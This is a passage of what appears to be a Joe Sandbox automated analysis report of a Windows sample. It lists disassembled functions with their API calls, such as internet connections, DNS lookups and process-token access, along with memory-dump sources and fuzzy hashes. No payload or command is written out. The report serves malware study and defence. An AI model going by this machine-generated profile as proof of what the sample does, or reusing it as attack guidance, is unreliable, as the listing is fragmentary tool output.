                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                    • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                    • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                    • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                    Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                      • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                      • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                    • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                    • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                    • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                    Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00435101
                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: e78659c2495b6b63b308f159c73bd6474a7bce38bfe5ddb54fe1fe7fc9b128d8
                    • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                    • Opcode Fuzzy Hash: e78659c2495b6b63b308f159c73bd6474a7bce38bfe5ddb54fe1fe7fc9b128d8
                    • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                    Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004044CF
                      • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                      • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                      • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                    • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                    • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                    • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                    • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                    Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                    • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                    • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                    • _memmove.LIBCMT ref: 004763D1
                    • inet_ntoa.WSOCK32(?), ref: 004763DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                    • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                    • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                    • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                    Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                    • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                    • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                    • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                    Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                    • GetClientRect.USER32(?,?), ref: 0043B5FB
                    • GetCursorPos.USER32(?), ref: 0043B605
                    • ScreenToClient.USER32(?,?), ref: 0043B610
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                    • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                    • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                    • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                    Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                    Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 0048B2E4
                    • ScreenToClient.USER32(?,?), ref: 0048B2FC
                    • ScreenToClient.USER32(?,?), ref: 0048B320
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                    • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                    • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                    • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                    Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                      • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                    • _memmove.LIBCMT ref: 00466C09
                    • _memset.LIBCMT ref: 00466C16
                    • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                    • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                    • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                    • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                    Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00402231
                    • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                    • SetBkMode.GDI32(?,00000001), ref: 00402250
                    • GetStockObject.GDI32(00000005), ref: 00402258
                    • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                    • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                    • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                    • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                    • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                    • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                    • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                    Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 0045871B
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                    • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                    • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                    • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                    Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: %I
                    • API String ID: 0-63094095
                    • Opcode ID: 9cd8c93b4346bea2d0012cc0db538a14987e271f1c5fa0d30356774a881f4158
                    • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                    • Opcode Fuzzy Hash: 9cd8c93b4346bea2d0012cc0db538a14987e271f1c5fa0d30356774a881f4158
                    • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                    Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __itow_s
                    • String ID: xbL$xbL
                    • API String ID: 3653519197-3351732020
                    • Opcode ID: dcc01ba0ed5f0697ccecc0fe2b3fdcd4052a1b1865999ffeb198b2c01a2bdcec
                    • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                    • Opcode Fuzzy Hash: dcc01ba0ed5f0697ccecc0fe2b3fdcd4052a1b1865999ffeb198b2c01a2bdcec
                    • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                    Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • __wcsnicmp.LIBCMT ref: 0046B02D
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                    • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                    • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                    • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
